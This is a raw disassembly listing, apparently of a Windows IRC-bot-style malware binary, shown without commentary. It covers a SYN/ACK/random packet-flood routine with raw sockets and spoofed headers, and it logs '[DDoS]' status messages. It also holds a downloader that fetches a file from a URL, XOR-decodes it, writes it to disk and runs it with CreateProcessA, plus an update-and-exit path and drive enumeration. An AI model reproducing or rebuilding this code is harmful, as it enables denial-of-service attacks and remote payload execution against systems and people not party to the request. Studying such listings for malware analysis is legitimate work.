call dword_43A324 ; IsWindow
test eax, eax
jz short loc_402731
push ebx
push [ebp+var_4]
push 42Dh
push esi
call dword_43A464 ; SendMessageA
loc_402731: ; CODE XREF: sub_4025BC+163�j
push esi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_40274E
lea eax, [ebp+var_6C]
push eax
push 60h
push 441h
push esi
call dword_43A464 ; SendMessageA
loc_40274E: ; CODE XREF: sub_4025BC+17E�j
push esi
mov [ebp+var_68], edi
mov [ebp+var_44], edi
mov [ebp+var_40], edi
mov [ebp+var_3C], edi
mov [ebp+var_38], 1
mov [ebp+var_34], 5
mov [ebp+var_6C], 1046Ah
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_40278C
lea eax, [ebp+var_6C]
push eax
push 60h
push 440h
push esi
call dword_43A464 ; SendMessageA
loc_40278C: ; CODE XREF: sub_4025BC+1BC�j
push esi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_4027A7
push [ebp+arg_0]
push edi
push 414h
push esi
call dword_43A464 ; SendMessageA
loc_4027A7: ; CODE XREF: sub_4025BC+1D9�j
push esi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_4027C0
push edi
push edi
push 43Eh
push esi
call dword_43A464 ; SendMessageA
loc_4027C0: ; CODE XREF: sub_4025BC+1F4�j
push esi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_4027DD
push [ebp+var_C]
push [ebp+var_4]
push 42Dh
push esi
call dword_43A464 ; SendMessageA
loc_4027DD: ; CODE XREF: sub_4025BC+20D�j
push [ebp+var_C]
call sub_416C97
push ebx
call sub_416C97
pop ecx
pop ecx
push esi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_402806
push edi
push edi
push 40Bh
push esi
call dword_43A464 ; SendMessageA
loc_402806: ; CODE XREF: sub_4025BC+66�j
; sub_4025BC+D9�j ...
push [ebp+var_8]
call dword_43A394 ; DestroyWindow
mov eax, edi
loc_402811: ; CODE XREF: sub_4025BC+3C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4025BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
sub_402816 proc near ; CODE XREF: sub_402B05+40�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = dword ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+64h+var_A8], bl
lea edi, [ebp+64h+var_A7]
rep stosd
stosw
stosb
lea eax, [ebp+64h+var_288]
push eax
push 202h
call dword_43A3AC ; WSAStartup
test eax, eax
jz short loc_402852
xor eax, eax
jmp loc_402AFE
; ---------------------------------------------------------------------------
loc_402852: ; CODE XREF: sub_402816+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_43A314 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+64h+var_18], eax
jz loc_402AF6
push 4
lea ecx, [ebp+64h+var_44]
push ecx
push 2
push ebx
push eax
mov [ebp+64h+var_44], edi
call dword_43A3B8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_402AED
push esi
push [ebp+64h+arg_C]
mov [ebp+64h+var_B8], 2
call dword_43A4F4 ; ntohs
mov esi, [ebp+64h+arg_0]
push 28h
mov [ebp+64h+var_B6], ax
mov [ebp+64h+var_B4], esi
mov [ebp+64h+var_30], 45h
call dword_43A4F4 ; ntohs
push [ebp+64h+arg_C]
mov [ebp+64h+var_2E], ax
mov [ebp+64h+var_2C], di
mov [ebp+64h+var_2A], bx
mov [ebp+64h+var_28], 80h
mov [ebp+64h+var_27], 6
mov [ebp+64h+var_26], bx
mov [ebp+64h+var_20], esi
call dword_43A4F4 ; ntohs
mov [ebp+64h+var_12], ax
call sub_41699A
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_43A4F4 ; ntohs
push 12345678h
call dword_43A4CC ; ntohl
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402919
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 2
jmp short loc_402969
; ---------------------------------------------------------------------------
loc_402919: ; CODE XREF: sub_402816+F8�j
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402933
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 10h
jmp short loc_402969
; ---------------------------------------------------------------------------
loc_402933: ; CODE XREF: sub_402816+112�j
mov esi, [ebp+64h+arg_8]
push 0Ch
mov edi, offset aDdos_random ; "ddos.random"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402969
call sub_41699A
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h+var_C], edx
call sub_41699A
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+64h+var_7], dl
loc_402969: ; CODE XREF: sub_402816+101�j
; sub_402816+11B�j ...
push 4000h
mov [ebp+64h+var_8], 50h
call dword_43A4F4 ; ntohs
mov [ebp+64h+var_6], ax
lea eax, [ebp+64h+var_6C]
push eax
mov [ebp+64h+var_2], bx
mov [ebp+64h+var_1C], ebx
call dword_42203C ; QueryPerformanceFrequency
lea eax, [ebp+64h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
push [ebp+64h+var_68]
mov eax, [ebp+64h+arg_10]
push [ebp+64h+var_6C]
cdq
push edx
push eax
call sub_4171B0
add eax, [ebp+64h+var_38]
adc edx, [ebp+64h+var_34]
mov [ebp+64h+var_40], eax
mov [ebp+64h+var_3C], edx
jmp short loc_4029DD
; ---------------------------------------------------------------------------
loc_4029B6: ; CODE XREF: sub_402816+2A4�j
add [ebp+64h+var_1C], eax
lea eax, [ebp+64h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
mov eax, [ebp+64h+var_34]
cmp eax, [ebp+64h+var_3C]
jg loc_402AE9
jl short loc_4029DD
mov eax, [ebp+64h+var_38]
cmp eax, [ebp+64h+var_40]
jnb loc_402AE9
loc_4029DD: ; CODE XREF: sub_402816+19E�j
; sub_402816+1B9�j
mov [ebp+64h+var_4], bx
call sub_41699A
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_43A4F4 ; ntohs
mov [ebp+64h+var_14], ax
call sub_41699A
call sub_41699A
push eax
call dword_43A4F4 ; ntohs
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call dword_43A4CC ; ntohl
inc [ebp+64h+arg_4]
mov esi, eax
mov eax, [ebp+64h+arg_0]
push 14h
mov [ebp+64h+var_60], eax
mov [ebp+64h+var_24], esi
mov [ebp+64h+var_5C], bl
mov [ebp+64h+var_5B], 6
call dword_43A4F4 ; ntohs
push 8
pop ecx
mov [ebp+64h+var_64], esi
mov [ebp+64h+var_5A], ax
push 5
lea esi, [ebp+64h+var_64]
lea edi, [ebp+64h+var_A8]
rep movsd
pop ecx
lea eax, [ebp+64h+var_A8]
push 34h
lea esi, [ebp+64h+var_14]
lea edi, [ebp+64h+var_88]
push eax
rep movsd
call sub_4088A8
push 5
pop ecx
push 5
lea esi, [ebp+64h+var_30]
lea edi, [ebp+64h+var_A8]
rep movsd
mov [ebp+64h+var_4], ax
pop ecx
lea esi, [ebp+64h+var_14]
lea edi, [ebp+64h+var_94]
rep movsd
xor eax, eax
lea edi, [ebp+64h+var_80]
stosd
lea eax, [ebp+64h+var_A8]
push 28h
push eax
call sub_4088A8
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+64h+var_26], ax
lea eax, [ebp+64h+var_B8]
push eax
push ebx
push 28h
lea eax, [ebp+64h+var_A8]
push eax
push [ebp+64h+var_18]
lea esi, [ebp+64h+var_30]
lea edi, [ebp+64h+var_A8]
rep movsd
call dword_43A36C ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_4029B6
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+64h+var_F8]
push offset aDdosSendErrorD ; "[DDoS]: Send error: <%d>."
push eax
call sub_416905
lea eax, [ebp+64h+var_F8]
push eax
call sub_401ECD
add esp, 10h
jmp short loc_402AEC
; ---------------------------------------------------------------------------
loc_402AE9: ; CODE XREF: sub_402816+1B3�j
; sub_402816+1C1�j
mov ebx, [ebp+64h+var_1C]
loc_402AEC: ; CODE XREF: sub_402816+2D1�j
pop esi
loc_402AED: ; CODE XREF: sub_402816+73�j
push [ebp+64h+var_18]
call dword_43A4B0 ; closesocket
loc_402AF6: ; CODE XREF: sub_402816+57�j
call dword_43A4BC ; WSACleanup
mov eax, ebx
loc_402AFE: ; CODE XREF: sub_402816+37�j
pop edi
pop ebx
add ebp, 64h
leave
retn
sub_402816 endp
; =============== S U B R O U T I N E =======================================
sub_402B05 proc near ; CODE XREF: sub_402B61+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40873C
push [esp+10h+arg_4]
mov esi, eax
call sub_416C92
push [esp+14h+arg_C]
mov ebx, eax
call sub_416C92
mov edi, eax
call sub_41699A
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_402816
add esp, 20h
test eax, eax
jnz short loc_402B52
inc eax
loc_402B52: ; CODE XREF: sub_402B05+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_402B05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B61 proc near ; DATA XREF: sub_409806+2E05�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0A5h
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call dword_42201C ; GetTickCount
push eax
call sub_41698D
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_402B05
push eax
lea eax, [ebp+var_494]
push offset aDdosDoneWithFl ; "[DDoS]: Done with flood (%iKB/sec)."
push eax
call sub_416905
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_402BF1
push esi
push [ebp+var_C]
lea eax, [ebp+var_494]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_405D20
add esp, 14h
loc_402BF1: ; CODE XREF: sub_402B61+6E�j
lea eax, [ebp+var_494]
push eax
call sub_401ECD
push [ebp+var_290]
call sub_41397A
pop ecx
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_402B61 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402C12 proc near ; CODE XREF: sub_402C2F+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_402C2E
loc_402C1E: ; CODE XREF: sub_402C12+1A�j
mov dl, byte_42FCD4
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_402C1E
locret_402C2E: ; CODE XREF: sub_402C12+A�j
retn
sub_402C12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C2F proc near ; DATA XREF: sub_409806+2BF5�o
; sub_409806+33EE�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_43A4E8
call dword_43A3A4 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_4030DE
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call dword_422034 ; CreateFileA
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_402CF6
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_402CD9
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D20
add esp, 14h
loc_402CD9: ; CODE XREF: sub_402C2F+88�j
lea eax, [ebp+var_610]
push eax
call sub_401ECD
push [ebp+var_8C]
call sub_41397A
pop ecx
jmp loc_40313F
; ---------------------------------------------------------------------------
loc_402CF6: ; CODE XREF: sub_402C2F+68�j
xor esi, esi
call dword_42201C ; GetTickCount
mov [ebp+var_4], eax
loc_402D01: ; CODE XREF: sub_402C2F+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
push [ebp+var_C]
call dword_43A450 ; InternetReadFile
cmp [ebp+var_78], ebx
jz short loc_402D3F
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_402C12
pop ecx
pop ecx
loc_402D3F: ; CODE XREF: sub_402C2F+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call dword_422030 ; WriteFile
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_402D64
cmp esi, [ebp+var_80]
ja short loc_402DA9
loc_402D64: ; CODE XREF: sub_402C2F+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_43B040
cmp [ebp+var_88], 1
jz short loc_402D92
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_402D97
; ---------------------------------------------------------------------------
loc_402D92: ; CODE XREF: sub_402C2F+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_402D97: ; CODE XREF: sub_402C2F+161�j
push eax
call sub_416905
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_402D01
loc_402DA9: ; CODE XREF: sub_402C2F+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_402DFE
cmp esi, [ebp+var_80]
jz short loc_402DFE
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_416905
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D20
lea eax, [ebp+var_610]
push eax
call sub_401ECD
add esp, 28h
loc_402DFE: ; CODE XREF: sub_402C2F+184�j
; sub_402C2F+189�j
call dword_42201C ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call dword_42202C ; CloseHandle
cmp [ebp+var_8], ebx
jz loc_40312B
cmp [ebp+var_88], 1
jz loc_402FEF
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402E4A
fadd dbl_422B68
loc_402E4A: ; CODE XREF: sub_402C2F+213�j
test esi, esi
fmul dbl_422B60
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_402E6C
fadd dbl_422B68
loc_402E6C: ; CODE XREF: sub_402C2F+235�j
fmul dbl_422B60
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_416905
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402EB0
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D20
add esp, 14h
loc_402EB0: ; CODE XREF: sub_402C2F+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401ECD
cmp [ebp+var_84], 1
pop ecx
jnz loc_40312B
cmp [ebp+var_74], ebx
jnz short loc_402F1A
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_416905
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D20
lea eax, [ebp+var_610]
push eax
call sub_401ECD
add esp, 28h
loc_402F1A: ; CODE XREF: sub_402C2F+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_422B08+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_402F53: ; CODE XREF: sub_402C2F+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_402F53
lea edi, [ebp+var_810]
dec edi
loc_402F6D: ; CODE XREF: sub_402C2F+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_402F6D
mov esi, offset asc_422B08 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_402F84: ; CODE XREF: sub_402C2F+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402F84
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_402F94: ; CODE XREF: sub_402C2F+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_402F94
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call dword_422044 ; CreateProcessA
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_402FE5
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_4030F0
; ---------------------------------------------------------------------------
loc_402FE5: ; CODE XREF: sub_402C2F+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_4030F0
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402C2F+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402FFF
fadd dbl_422B68
loc_402FFF: ; CODE XREF: sub_402C2F+3C8�j
test esi, esi
fmul dbl_422B60
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_403021
fadd dbl_422B68
loc_403021: ; CODE XREF: sub_402C2F+3EA�j
fmul dbl_422B60
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_416905
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_403065
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D20
add esp, 14h
loc_403065: ; CODE XREF: sub_402C2F+414�j
lea eax, [ebp+var_610]
push eax
call sub_401ECD
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_422B08+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call dword_422044 ; CreateProcessA
cmp eax, esi
jnz short loc_4030D0
call dword_43A4BC ; WSACleanup
call sub_407534
push ebx
call dword_422040 ; ExitProcess
loc_4030D0: ; CODE XREF: sub_402C2F+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_4030EA
; ---------------------------------------------------------------------------
loc_4030DE: ; CODE XREF: sub_402C2F+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_4030EA: ; CODE XREF: sub_402C2F+4AD�j
lea eax, [ebp+var_610]
loc_4030F0: ; CODE XREF: sub_402C2F+3B1�j
; sub_402C2F+3BB�j
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_40311E
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D20
add esp, 14h
loc_40311E: ; CODE XREF: sub_402C2F+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401ECD
pop ecx
loc_40312B: ; CODE XREF: sub_402C2F+1F8�j
; sub_402C2F+295�j
push [ebp+var_C]
call dword_43A3FC ; InternetCloseHandle
push [ebp+var_8C]
call sub_41397A
loc_40313F: ; CODE XREF: sub_402C2F+C2�j
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_402C2F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403148 proc near ; CODE XREF: sub_409806+568B�p
; sub_409806+57DE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_417234
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_403148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403162 proc near ; CODE XREF: sub_403266+66�p
; sub_403266+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_438A7C
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_403182: ; CODE XREF: sub_403162+50�j
; sub_403162+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417280
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_4031BA
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_403182
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_403182
; ---------------------------------------------------------------------------
loc_4031BA: ; CODE XREF: sub_403162+40�j
mov eax, esi
pop ebx
jmp short loc_4031C4
; ---------------------------------------------------------------------------
loc_4031BF: ; CODE XREF: sub_403162+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_4031C4: ; CODE XREF: sub_403162+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_4031BF
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_403162 endp
; =============== S U B R O U T I N E =======================================
sub_4031D5 proc near ; CODE XREF: sub_403381+3E�p
; sub_403381+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43A31C ; GetDriveTypeA
sub eax, 0
jz short loc_403218
dec eax
jz short loc_403212
dec eax
dec eax
jz short loc_40320C
dec eax
jz short loc_403206
dec eax
jz short loc_403200
dec eax
jz short loc_4031FA
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_4031FA: ; CODE XREF: sub_4031D5+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_403200: ; CODE XREF: sub_4031D5+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_403206: ; CODE XREF: sub_4031D5+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40320C: ; CODE XREF: sub_4031D5+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_403212: ; CODE XREF: sub_4031D5+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_403218: ; CODE XREF: sub_4031D5+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4031D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40321E proc near ; CODE XREF: sub_403266+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_43A398
test eax, eax
jz short loc_403253
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_403253: ; CODE XREF: sub_40321E+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40321E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403266 proc near ; CODE XREF: sub_403381+17�p
; sub_412AEE+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_40321E
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40333E
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40333E
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
